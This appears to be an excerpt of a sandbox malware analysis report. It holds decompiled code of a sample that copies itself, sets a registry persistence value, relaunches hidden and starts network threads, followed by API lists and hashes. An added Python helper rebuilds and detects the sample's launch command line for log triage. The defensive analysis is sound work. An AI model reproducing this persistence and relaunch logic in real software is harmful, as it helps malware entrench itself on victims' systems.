                                                                                                                                  								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
                                                                                                                                  									_t303[3] = 0;
                                                                                                                                  									_t304 = GetDriveTypeA(_t303);
                                                                                                                                  									_t515 = _t304 - 2;
                                                                                                                                  									if(_t304 != 2) {
                                                                                                                                  										E02519145(_t515);
                                                                                                                                  										_t438 = 1;
                                                                                                                                  									}
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  							goto L19;
                                                                                                                                  						} else {
                                                                                                                                  							E02514280(_t438, 1);
                                                                                                                                  							_pop(_t438);
                                                                                                                                  							if(_v672 == 0) {
                                                                                                                                  								goto L84;
                                                                                                                                  							}
                                                                                                                                  							_t309 = E0251675C( &_v672,  &_v12, 0);
                                                                                                                                  							_t467 = _t467 + 0xc;
                                                                                                                                  							_v8 = _t309;
                                                                                                                                  							if(_t309 == 0 || _v12 == 0) {
                                                                                                                                  								goto L84;
                                                                                                                                  							} else {
                                                                                                                                  								_v32 = 0;
                                                                                                                                  								_v28 = 0;
                                                                                                                                  								if(_v16 == 2) {
                                                                                                                                  									L55:
                                                                                                                                  									__eflags = _v16 - 3;
                                                                                                                                  									if(_v16 >= 3) {
                                                                                                                                  										L83:
                                                                                                                                  										E0251EC2E(_v8);
                                                                                                                                  										_pop(_t438);
                                                                                                                                  										if(_v36 != 0) {
                                                                                                                                  											goto L19;
                                                                                                                                  										}
                                                                                                                                  										goto L84;
                                                                                                                                  									}
                                                                                                                                  									_t312 = E02512544(_t459, 0x2520a3c, 0xc, 0xe4, 0xc8);
                                                                                                                                  									_t469 = _t467 + 0x14;
                                                                                                                                  									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
                                                                                                                                  									if(__eflags == 0) {
                                                                                                                                  										L82:
                                                                                                                                  										E0251EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  										_t467 = _t469 + 0xc;
                                                                                                                                  										goto L83;
                                                                                                                                  									}
                                                                                                                                  									_t318 = E025199D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
                                                                                                                                  									_t469 = _t469 + 0x14;
                                                                                                                                  									__eflags = _t318;
                                                                                                                                  									if(_t318 == 0) {
                                                                                                                                  										goto L82;
                                                                                                                                  									}
                                                                                                                                  									E0251EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  									_t470 = _t469 + 0xc;
                                                                                                                                  									_v1272 = 0x22;
                                                                                                                                  									lstrcpyA( &_v1271,  &_v672);
                                                                                                                                  									_t324 = lstrlenA( &_v1272);
                                                                                                                                  									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
                                                                                                                                  									_t325 = _t324 + 1;
                                                                                                                                  									__eflags = _v16 - 2;
                                                                                                                                  									_a12 = _t325;
                                                                                                                                  									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
                                                                                                                                  									if(_v16 != 2) {
                                                                                                                                  										L60:
                                                                                                                                  										_push(0);
                                                                                                                                  										_push( &_v112);
                                                                                                                                  										_t328 = E02516DC2(_t438) ^ 0x5e5e5e5e;
                                                                                                                                  										__eflags = _t328;
                                                                                                                                  										_push(_t328);
                                                                                                                                  										E0251F133();
                                                                                                                                  										_t470 = _t470 + 0xc;
                                                                                                                                  										L61:
                                                                                                                                  										_t331 = E02512544(_t459,  &E025206AC, 0x2e, 0xe4, 0xc8);
                                                                                                                                  										_t471 = _t470 + 0x14;
                                                                                                                                  										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
                                                                                                                                  										_v20 = _t332;
                                                                                                                                  										__eflags = _t332;
                                                                                                                                  										if(_t332 == 0) {
                                                                                                                                  											_t373 =  &(_a12[1]);
                                                                                                                                  											__eflags = _t373;
                                                                                                                                  											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
                                                                                                                                  											RegCloseKey(_v24);
                                                                                                                                  										}
                                                                                                                                  										E0251EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  										E0251EE2A(_t438,  &_v772, 0, 0x44);
                                                                                                                                  										_v772.cb = 0x44;
                                                                                                                                  										E0251EE2A(_t438,  &_v64, 0, 0x10);
                                                                                                                                  										_t469 = _t471 + 0x24;
                                                                                                                                  										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
                                                                                                                                  										__eflags = _t340;
                                                                                                                                  										if(_t340 != 0) {
                                                                                                                                  											__eflags = _v372 - 0x22;
                                                                                                                                  											_t357 =  &_v372;
                                                                                                                                  											_v40 = _t357;
                                                                                                                                  											if(_v372 == 0x22) {
                                                                                                                                  												_t357 =  &_v371;
                                                                                                                                  												_v40 = _t357;
                                                                                                                                  											}
                                                                                                                                  											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
                                                                                                                                  											if( *((char*)(_t357 + 1)) == 0x3a) {
                                                                                                                                  												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
                                                                                                                                  												if( *((char*)(_t357 + 2)) == 0x5c) {
                                                                                                                                  													_t358 = _v40;
                                                                                                                                  													_t438 = _t358[3];
                                                                                                                                  													_a15 = _t358[3];
                                                                                                                                  													_t358[3] = 0;
                                                                                                                                  													_t359 = GetDriveTypeA(_t358);
                                                                                                                                  													__eflags = _t359 - 2;
                                                                                                                                  													if(_t359 != 2) {
                                                                                                                                  														_t438 = _v40;
                                                                                                                                  														_v40[3] = _a15;
                                                                                                                                  														lstrcatA( &_v1272, E02512544(_t459, 0x2520a38, 4, 0xe4, 0xc8));
                                                                                                                                  														E0251EE2A(_v40, _t459, 0, _t454);
                                                                                                                                  														_t469 = _t469 + 0x20;
                                                                                                                                  														__eflags = _v372 - 0x22;
                                                                                                                                  														if(_v372 != 0x22) {
                                                                                                                                  															lstrcatA( &_v1272, "\"");
                                                                                                                                  														}
                                                                                                                                  														lstrcatA( &_v1272,  &_v372);
                                                                                                                                  														__eflags = _v372 - 0x22;
                                                                                                                                  														if(_v372 != 0x22) {
                                                                                                                                  															lstrcatA( &_v1272, "\"");
                                                                                                                                  														}
                                                                                                                                  														_v36 = 1;
                                                                                                                                  													}
                                                                                                                                  												}
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										__eflags = _v32;
                                                                                                                                  										if(_v32 != 0) {
                                                                                                                                  											__eflags = _v28;
                                                                                                                                  											if(_v28 != 0) {
                                                                                                                                  												wsprintfA( &_v372, "%X%08X", _v28, _v32);
                                                                                                                                  												lstrcatA( &_v1272, E02512544(_t459, 0x2520a28, 4, 0xe4, 0xc8));
                                                                                                                                  												E0251EE2A(_t438, _t459, 0, _t454);
                                                                                                                                  												_t469 = _t469 + 0x30;
                                                                                                                                  												lstrcatA( &_v1272,  &_v372);
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
                                                                                                                                  										__eflags = _t344;
                                                                                                                                  										if(_t344 == 0) {
                                                                                                                                  											DeleteFileA( &_v672);
                                                                                                                                  											_v36 = 0;
                                                                                                                                  										}
                                                                                                                                  										__eflags = _v16 - 1;
                                                                                                                                  										if(_v16 == 1) {
                                                                                                                                  											__eflags = _v20;
                                                                                                                                  											if(_v20 == 0) {
                                                                                                                                  												E025196FF(_t438);
                                                                                                                                  											}
                                                                                                                                  										}
                                                                                                                                  										goto L82;
                                                                                                                                  									}
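The branch above (L60/L61) is the sample's install-and-relaunch step: it writes a quoted path of its dropped copy into an HKCU value (the key name comes from E02512544 over E025206AC and the value name from E02516DC2 ^ 0x5e5e5e5e, both produced at runtime and not visible in this listing), then builds a command line of the form `"<copy>" [<sep> "<original>"] [<sep> <HEX>]` and hands it to CreateProcessA with CREATE_NO_WINDOW (0x8000000), deleting the copy if the launch fails. The original path is appended only when it has an `X:\` prefix and GetDriveTypeA on that prefix is not 2 (DRIVE_REMOVABLE); the hex suffix is wsprintfA("%X%08X", _v28, _v32) and is appended only when both values are non-zero. The Python below is an added example for analysts, not code from the report or from the sample: it rebuilds that command line from the visible logic and parses process-creation log lines back into the same fields. The two 4-byte separator strings returned by E02512544 at 0x2520a38 and 0x2520a28 are decrypted at runtime and unknown here; they are parameters with a placeholder default of a single space. All sample paths are constructed.

```python
"""Reconstruct and triage the launch command line built before CreateProcessA.

Added example; not from the Joe Sandbox report or the analysed sample.
Assumption: the two runtime-decrypted separator strings are passed in as
`sep_orig` and `sep_token`; the " " defaults are placeholders, not real values.
"""
import re
from typing import Optional

# GetDriveTypeA return value the routine tests against (`_t359 != 2`).
DRIVE_REMOVABLE = 2

# "<copy>" [<sep> "<orig>"] [<sep> <HEX>]; <HEX> is "%X%08X" of two DWORDs,
# i.e. 1-8 hex digits followed by exactly 8, so 9-16 upper-case hex digits.
_CMD_RE = re.compile(
    r'^"(?P<copy>[^"]+)"'
    r'(?:(?P<sep1>[^"]*?)"(?P<orig>[^"]+)")?'
    r'(?:(?P<sep2>[^"]*?)(?P<token>[0-9A-F]{9,16}))?$'
)


def drive_prefix(path: str) -> Optional[str]:
    """Mirror `_t303[1] == ':' && _t303[2] == '\\'` after skipping a leading quote.

    Returns the `X:\\` prefix the sample passes to GetDriveTypeA (it writes a
    NUL at index 3 first), or None for UNC / relative paths.
    """
    if path.startswith('"'):
        path = path[1:]
    if len(path) >= 3 and path[1] == ':' and path[2] == '\\':
        return path[:3]
    return None


def build_launch_cmdline(copy_path: str, orig_path: str, orig_drive_type: int,
                         hi: int, lo: int, sep_orig: str = " ",
                         sep_token: str = " ") -> str:
    """Rebuild the buffer (_v1272) handed to CreateProcessA as its command line."""
    cmd = '"' + copy_path + '"'                      # _v1272 = '"' + _v672 + '"'
    # Original image path appended only for `X:\` paths on a non-removable drive.
    if drive_prefix(orig_path) is not None and orig_drive_type != DRIVE_REMOVABLE:
        cmd += sep_orig
        # lstrcatA adds quotes only if the path does not already start with one.
        cmd += orig_path if orig_path.startswith('"') else '"' + orig_path + '"'
    # Token appended only when both _v28 and _v32 are non-zero.
    if hi != 0 and lo != 0:
        cmd += sep_token + f"{hi:X}{lo:08X}"        # wsprintfA("%X%08X", hi, lo)
    return cmd


def parse_launch_cmdline(cmdline: str) -> Optional[dict]:
    """Split a logged command line into copy path, original path and hex token."""
    m = _CMD_RE.match(cmdline)
    if m is None:
        return None
    return {"copy": m.group("copy"), "orig": m.group("orig"),
            "token": m.group("token")}


def triage(cmdline: str) -> dict:
    """Flags for a process-creation event; `matches_shape` False if no match."""
    parsed = parse_launch_cmdline(cmdline)
    if parsed is None:
        return {"matches_shape": False}
    copy_low = parsed["copy"].lower()
    return {
        "matches_shape": True,
        # A second quoted image that differs from the launched one: the copy
        # is being told where the original lives.
        "relaunch_of_other_image": parsed["orig"] is not None
                                   and parsed["orig"].lower() != copy_low,
        # Heuristic only: the listing shows GetTempPathA and an env-var path
        # as install targets, so a Temp/Tmp location is worth a closer look.
        "copy_in_temp_dir": "\\temp\\" in copy_low or "\\tmp\\" in copy_low,
        "has_hex_token": parsed["token"] is not None,
    }


if __name__ == "__main__":
    # Constructed sample, not observed data.
    line = build_launch_cmdline(r"C:\Users\u\AppData\Local\Temp\svc.exe",
                                r"D:\Downloads\sample.exe", 3, 0x1A, 0xDEADBEEF)
    print(line)
    print(triage(line))
```

Run it over the `CommandLine` field of process-creation events (Sysmon event 1 or Security 4688 with command-line auditing on) rather than over the binary: the separators and the registry key/value names are only recoverable from a memory dump of the running sample, so the stable observable is the quoted-copy, quoted-original, hex-token shape.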
                                                                                                                                  									__eflags = _v112;
                                                                                                                                  									if(_v112 != 0) {
                                                                                                                                  										goto L61;
                                                                                                                                  									}
                                                                                                                                  									goto L60;
                                                                                                                                  								}
                                                                                                                                  								_t379 = GetTempPathA(0x1f4,  &_v1272);
								_t494 = _t379;
								if(_t379 == 0) {
									goto L55;
								}
								_t383 = E025199D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
								_t467 = _t467 + 0x14;
								if(_t383 == 0) {
									goto L55;
								}
								_v80 = 0;
								if(_v16 < 3 || _v372 == 0) {
									_push(0);
									_push( &_v80);
									_push(E02516DC2(_t438) ^ 0x5e5e5e5e);
									E0251F133();
									_t474 = _t467 + 0xc;
									lstrcpyA( &_v372, E02516CC9(_t438));
									lstrcatA( &_v372,  &_v80);
									lstrcatA( &_v372,  &E0252070C);
									_t396 = 0;
									__eflags = 0;
									goto L43;
								} else {
									_t410 =  &_v372;
									_t450 = _t410 + 1;
									do {
										_t441 =  *_t410;
										_t410 = _t410 + 1;
									} while (_t441 != 0);
									_t411 = _t410 - _t450;
									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
										_t411 = _t411 - 1;
									}
									_t451 = _t411;
									if(_t411 <= 0) {
										L41:
										_t449 = _t451 - _t411;
										_a12 = _t451 - _t411;
										E0251EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
										_t474 = _t467 + 0xc;
										_t396 = 1;
										L43:
										if(_v44 == 0 || _v48 < 0x50) {
											_t438 = 1;
											__eflags = 1;
										} else {
											_t438 = 0;
										}
										_push(_t438);
										_push(_t396);
										_push( &_v372);
										_push( &_v80);
										_push( &_v672);
										_push( &_v704);
										_t401 = E02519326(_t438, _t449);
										_t467 = _t474 + 0x18;
										if(_t401 == 0) {
											_t402 =  *0x252217c; // 0x0
											_v32 = _t402;
											_t403 =  *0x2522180; // 0x0
											goto L54;
										} else {
											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
												_t403 = 0x5e0d0108;
												 *0x2522180 = 0x5e0d0108;
												 *0x252217c = 0;
												_v32 = 0;
												L54:
												_v28 = _t403;
												DeleteFileA( &_v672);
												goto L55;
											}
											_t459 = 1;
											if(_v16 == 1) {
												E025196FF(_t438);
											}
											_v36 = _t459;
											goto L83;
										}
									} else {
										_t442 =  &_v372;
										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
											_t411 = _t411 - 1;
											if(_t411 > 0) {
												continue;
											}
											goto L41;
										}
										goto L41;
									}
								}
							}
						}
					}
					_t417 = _v8;
					_t454 = _t417 + 3;
					_v372 = 0;
					if( *((char*)(_t417 + 3)) != 0x22) {
						_t418 = E0251ED03(_t454, 0x20);
						_pop(_t438);
						__eflags = _t418;
						if(_t418 == 0) {
							_t418 =  &(_a12[lstrlenA(_a12)]);
							__eflags = _t418;
						}
						_t459 = _t418 - _v8;
						__eflags = _t459;
						E0251EE08( &_v372, _t454, _t459 - 3);
						 *((char*)(_t464 + _t459 - 0x173)) = 0;
						L13:
						_t467 = _t467 + 0xc;
						L14:
						if(_v372 != 0 && _v672 != 0) {
							_t424 = E0251675C( &_v672,  &_v12, 0);
							_t467 = _t467 + 0xc;
							if(_t424 != 0 && _v12 != 0) {
								_t426 = E02516A60(_t449,  &_v372, _t424, _v12);
								_t467 = _t467 + 0xc;
								_v12 = _t426;
							}
						}
						goto L19;
					}
					_t454 = _t417 + 4;
					_t428 = E0251ED03(_t417 + 4, 0x22);
					_pop(_t438);
					if(_t428 == 0) {
						goto L14;
					} else {
						_t459 = _t428 - _v8;
						E0251EE08( &_v372, _t454, _t459 - 4);
						 *((char*)(_t464 + _t459 - 0x174)) = 0;
						goto L13;
					}
				}
			}
                                                                                                                                  0x0251a30d
                                                                                                                                  0x0251a310
                                                                                                                                  0x0251a313
                                                                                                                                  0x0251a35a
                                                                                                                                  0x0251a35a
                                                                                                                                  0x0251a35f
                                                                                                                                  0x0251a361
                                                                                                                                  0x0251a3c2
                                                                                                                                  0x02519c05
                                                                                                                                  0x02519c06
                                                                                                                                  0x02519c06
                                                                                                                                  0x0251a363
                                                                                                                                  0x0251a369
                                                                                                                                  0x0251a397
                                                                                                                                  0x0251a397
                                                                                                                                  0x0251a39d
                                                                                                                                  0x0251a3a3
                                                                                                                                  0x0251a3aa
                                                                                                                                  0x0251a3b1
                                                                                                                                  0x0251a3b4
                                                                                                                                  0x0251a3b7
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a3b7
                                                                                                                                  0x0251a36b
                                                                                                                                  0x0251a371
                                                                                                                                  0x0251a374
                                                                                                                                  0x0251a374
                                                                                                                                  0x0251a376
                                                                                                                                  0x0251a377
                                                                                                                                  0x0251a377
                                                                                                                                  0x0251a37d
                                                                                                                                  0x0251a380
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a38e
                                                                                                                                  0x0251a394
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a394
                                                                                                                                  0x0251a318
                                                                                                                                  0x0251a31e
                                                                                                                                  0x0251a324
                                                                                                                                  0x0251a325
                                                                                                                                  0x0251a327
                                                                                                                                  0x0251a339
                                                                                                                                  0x0251a33b
                                                                                                                                  0x0251a33d
                                                                                                                                  0x0251a340
                                                                                                                                  0x0251a344
                                                                                                                                  0x0251a344
                                                                                                                                  0x0251a34c
                                                                                                                                  0x0251a351
                                                                                                                                  0x0251a354
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a354
                                                                                                                                  0x0251a329
                                                                                                                                  0x0251a32b
                                                                                                                                  0x0251a32e
                                                                                                                                  0x0251a32e
                                                                                                                                  0x0251a330
                                                                                                                                  0x0251a331
                                                                                                                                  0x0251a331
                                                                                                                                  0x0251a337
                                                                                                                                  0x0251a337
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a337
                                                                                                                                  0x0251a228
                                                                                                                                  0x0251a22b
                                                                                                                                  0x0251a231
                                                                                                                                  0x0251a234
                                                                                                                                  0x0251a237
                                                                                                                                  0x0251a27a
                                                                                                                                  0x0251a280
                                                                                                                                  0x0251a281
                                                                                                                                  0x0251a283
                                                                                                                                  0x0251a28e
                                                                                                                                  0x0251a28e
                                                                                                                                  0x0251a28e
                                                                                                                                  0x0251a291
                                                                                                                                  0x0251a294
                                                                                                                                  0x0251a297
                                                                                                                                  0x0251a2a5
                                                                                                                                  0x0251a2ad
                                                                                                                                  0x0251a2b4
                                                                                                                                  0x0251a2b4
                                                                                                                                  0x0251a2b7
                                                                                                                                  0x0251a2b7
                                                                                                                                  0x0251a2bd
                                                                                                                                  0x0251a2d0
                                                                                                                                  0x0251a2d5
                                                                                                                                  0x0251a2d5
                                                                                                                                  0x0251a2d8
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a2d8
                                                                                                                                  0x0251a242
                                                                                                                                  0x0251a245
                                                                                                                                  0x0251a24b
                                                                                                                                  0x0251a24c
                                                                                                                                  0x0251a24e
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a253
                                                                                                                                  0x0251a264
                                                                                                                                  0x0251a26c
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a26c
                                                                                                                                  0x02519c39
                                                                                                                                  0x02519c3f
                                                                                                                                  0x0251a167
                                                                                                                                  0x0251a183
                                                                                                                                  0x0251a190
                                                                                                                                  0x0251a196
                                                                                                                                  0x0251a198
                                                                                                                                  0x0251a198
                                                                                                                                  0x0251a1a2
                                                                                                                                  0x0251a1b3
                                                                                                                                  0x0251a1b6
                                                                                                                                  0x0251a1bc
                                                                                                                                  0x0251a1bf
                                                                                                                                  0x0251a1c7
                                                                                                                                  0x0251a1cc
                                                                                                                                  0x0251a1cc
                                                                                                                                  0x0251a1bf
                                                                                                                                  0x0251a1a2
                                                                                                                                  0x00000000
                                                                                                                                  0x02519c54
                                                                                                                                  0x02519c56
                                                                                                                                  0x02519c5b
                                                                                                                                  0x02519c62
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519c74
                                                                                                                                  0x02519c79
                                                                                                                                  0x02519c7c
                                                                                                                                  0x02519c81
                                                                                                                                  0x00000000
                                                                                                                                  0x02519c90
                                                                                                                                  0x02519c94
                                                                                                                                  0x02519c97
                                                                                                                                  0x02519c9a
                                                                                                                                  0x02519e3e
                                                                                                                                  0x02519e3e
                                                                                                                                  0x02519e42
                                                                                                                                  0x0251a155
                                                                                                                                  0x0251a158
                                                                                                                                  0x0251a15d
                                                                                                                                  0x0251a161
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a161
                                                                                                                                  0x02519e66
                                                                                                                                  0x02519e6b
                                                                                                                                  0x02519e75
                                                                                                                                  0x02519e77
                                                                                                                                  0x0251a14a
                                                                                                                                  0x0251a14d
                                                                                                                                  0x0251a152
                                                                                                                                  0x00000000
                                                                                                                                  0x0251a152
                                                                                                                                  0x02519e98
                                                                                                                                  0x02519e9d
                                                                                                                                  0x02519ea0
                                                                                                                                  0x02519ea2
                                                                                                                                  0x00000000
                                                                                                                                  0x00000000
                                                                                                                                  0x02519eab
                                                                                                                                  0x02519eb0
                                                                                                                                  0x02519ec1
                                                                                                                                  0x02519ec8
                                                                                                                                  0x02519ed5
                                                                                                                                  0x02519edb
                                                                                                                                  0x02519ee3
                                                                                                                                  0x02519ee4
                                                                                                                                  0x02519ee8
                                                                                                                                  0x02519eeb
                                                                                                                                  0x02519ef2
                                                                                                                                  0x02519ef9
                                                                                                                                  0x02519efc
                                                                                                                                  0x02519efd
                                                                                                                                  0x02519f03
                                                                                                                                  0x02519f03
                                                                                                                                  0x02519f08
                                                                                                                                  0x02519f09
                                                                                                                                  0x02519f0e
                                                                                                                                  0x02519f11
                                                                                                                                  0x02519f2d
                                                                                                                                  0x02519f32
                                                                                                                                  0x02519f3b
                                                                                                                                  0x02519f41
                                                                                                                                  0x02519f44
                                                                                                                                  0x02519f46
                                                                                                                                  0x02519f4b
                                                                                                                                  0x02519f4b
                                                                                                                                  0x02519f67
                                                                                                                                  0x02519f6a
                                                                                                                                  0x02519f6a
                                                                                                                                  0x02519f73
[Control-flow graph listing: only the address column survived extraction (addresses 0x02519b47 to 0x0251a145, plus 0x00000000 entries); the instruction text of each node is not present on the page]

APIs
• SetErrorMode.KERNEL32(00000003), ref: 02519A7F
• SetErrorMode.KERNEL32(00000003), ref: 02519A83
• SetUnhandledExceptionFilter.KERNEL32(02516511), ref: 02519A8A
  • Part of subcall function 0251EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0251EC5E
  • Part of subcall function 0251EC54: GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0251EC72
  • Part of subcall function 0251EC54: GetTickCount.KERNEL32 ref: 0251EC78
• GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 02519AB3
• GetModuleFileNameA.KERNEL32(00000000), ref: 02519ABA
• GetCommandLineA.KERNEL32 ref: 02519AFD
• lstrlenA.KERNEL32(?), ref: 02519B99
• ExitProcess.KERNEL32 ref: 02519C06
• GetTempPathA.KERNEL32(000001F4,?), ref: 02519CAC
• lstrcpyA.KERNEL32(?,00000000), ref: 02519D7A
• lstrcatA.KERNEL32(?,?), ref: 02519D8B
• lstrcatA.KERNEL32(?,0252070C), ref: 02519D9D
• GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 02519DED
• DeleteFileA.KERNEL32(00000022), ref: 02519E38
• GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 02519E6F
• lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 02519EC8
• lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 02519ED5
• RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 02519F3B
• RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 02519F5E
• RegCloseKey.ADVAPI32(?,?,?,00000000,00000103,?), ref: 02519F6A
• GetModuleHandleA.KERNEL32(00000000,?,00000104,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103), ref: 02519FAD
• GetModuleFileNameA.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 02519FB4
• GetDriveTypeA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 02519FFE
• lstrcatA.KERNEL32(00000022,00000000), ref: 0251A038
• lstrcatA.KERNEL32(00000022,02520A34), ref: 0251A05E
• lstrcatA.KERNEL32(00000022,00000022), ref: 0251A072
• lstrcatA.KERNEL32(00000022,02520A34), ref: 0251A08D
• wsprintfA.USER32 ref: 0251A0B6
• lstrcatA.KERNEL32(00000022,00000000), ref: 0251A0DE
                                                                                                                                  • lstrcatA.KERNEL32(00000022,?), ref: 0251A0FD
                                                                                                                                  • CreateProcessA.KERNEL32(00000000,00000022,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?), ref: 0251A120
                                                                                                                                  • DeleteFileA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,00000000,00000103,?), ref: 0251A131
                                                                                                                                  • GetModuleHandleA.KERNEL32(00000000,00000022,0000012C), ref: 0251A174
                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000), ref: 0251A17B
                                                                                                                                  • GetDriveTypeA.KERNEL32(00000022), ref: 0251A1B6
                                                                                                                                  • GetCommandLineA.KERNEL32 ref: 0251A1E5
                                                                                                                                    • Part of subcall function 025199D2: lstrcpyA.KERNEL32(?,?,00000100,025222F8,00000000,?,02519E9D,?,00000022,?,?,?,?,?,?,?), ref: 025199DF
                                                                                                                                    • Part of subcall function 025199D2: lstrcatA.KERNEL32(00000022,00000000,?,?,02519E9D,?,00000022,?,?,?,?,?,?,?,000001F4), ref: 02519A3C
                                                                                                                                    • Part of subcall function 025199D2: lstrcatA.KERNEL32(?,00000022,?,?,?,?,?,02519E9D,?,00000022,?,?,?), ref: 02519A52
                                                                                                                                  • lstrlenA.KERNEL32(?), ref: 0251A288
                                                                                                                                  • StartServiceCtrlDispatcherA.ADVAPI32(?), ref: 0251A3B7
                                                                                                                                  • GetLastError.KERNEL32 ref: 0251A3ED
                                                                                                                                  • Sleep.KERNEL32(000003E8), ref: 0251A400
                                                                                                                                  • DeleteFileA.KERNEL32(025233D8), ref: 0251A407
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0251405E,00000000,00000000,00000000), ref: 0251A42C
                                                                                                                                  • WSAStartup.WS2_32(00001010,?), ref: 0251A43A
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,0251877E,00000000,00000000,00000000), ref: 0251A469
                                                                                                                                  • Sleep.KERNEL32(00000BB8), ref: 0251A48A
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251A49F
                                                                                                                                  • GetTickCount.KERNEL32 ref: 0251A4B7
                                                                                                                                  • Sleep.KERNEL32(00001A90), ref: 0251A4C3
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000011.00000002.527823849.0000000002510000.00000040.00000400.00020000.00000000.sdmp, Offset: 02510000, based on PE: true
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_17_2_2510000_svchost.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: lstrcat$File$Module$CountCreateDeleteErrorHandleNameSleepTicklstrcpylstrlen$CommandDriveLineModeProcessThreadTimeType$AttributesCloseCtrlDispatcherEnvironmentExceptionExitFilterInformationLastOpenPathServiceStartStartupSystemTempUnhandledValueVariableVolumewsprintf
                                                                                                                                  • String ID: "$"$"$%X%08X$0 v$C:\Windows\SysWOW64\ghrubsm\pjzcupje.exe$D$P$\$ghrubsm
                                                                                                                                  • API String ID: 2089075347-772048286
                                                                                                                                  • Opcode ID: 7964c0a05975bea64c2f2b51053ec5ded7c38b8bd5d8149a5fab50ae02e8fbe5
                                                                                                                                  • Instruction ID: 9cff27e52e893545b7b466fb10f902eedeed5d714d75e821715f89b056f05b02
                                                                                                                                  • Opcode Fuzzy Hash: 7964c0a05975bea64c2f2b51053ec5ded7c38b8bd5d8149a5fab50ae02e8fbe5
                                                                                                                                  • Instruction Fuzzy Hash: 0352A4B1D4125AAFFB21DFA0CC49EEE7BBDBB45304F0445A5E509E2180E7709A48CF69
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  Control-flow Graph

                                                                                                                                  • Executed
                                                                                                                                  • Not Executed
                                                                                                                                  control_flow_graph 905 251199c-25119cc inet_addr LoadLibraryA 906 25119d5-25119fe GetProcAddress * 3 905->906 907 25119ce-25119d0 905->907 909 2511ab3-2511ab6 FreeLibrary 906->909 910 2511a04-2511a06 906->910 908 2511abf-2511ac2 907->908 912 2511abc 909->912 910->909 911 2511a0c-2511a0e 910->911 911->909 913 2511a14-2511a28 GetBestInterface GetProcessHeap 911->913 914 2511abe 912->914 913->912 915 2511a2e-2511a40 HeapAlloc 913->915 914->908 915->912 916 2511a42-2511a50 GetAdaptersInfo 915->916 917 2511a62-2511a67 916->917 918 2511a52-2511a60 HeapReAlloc 916->918 919 2511aa1-2511aad FreeLibrary 917->919 920 2511a69-2511a73 GetAdaptersInfo 917->920 918->917 919->912 922 2511aaf-2511ab1 919->922 920->919 921 2511a75 920->921 923 2511a77-2511a80 921->923 922->914 924 2511a82-2511a86 923->924 925 2511a8a-2511a91 923->925 924->923 926 2511a88 924->926 927 2511a93 925->927 928 2511a96-2511a9b HeapFree 925->928 926->928 927->928 928->919
                                                                                                                                  C-Code - Quality: 54%
                                                                                                                                  			E0251199C(void* __eax) {
                                                                                                                                  				long _v8;
                                                                                                                                  				_Unknown_base(*)()* _v12;
                                                                                                                                  				struct HINSTANCE__* _v16;
                                                                                                                                  				char _v20;
                                                                                                                                  				void* _v24;
                                                                                                                                  				long _v28;
                                                                                                                                  				struct HINSTANCE__* _t27;
                                                                                                                                  				_Unknown_base(*)()* _t30;
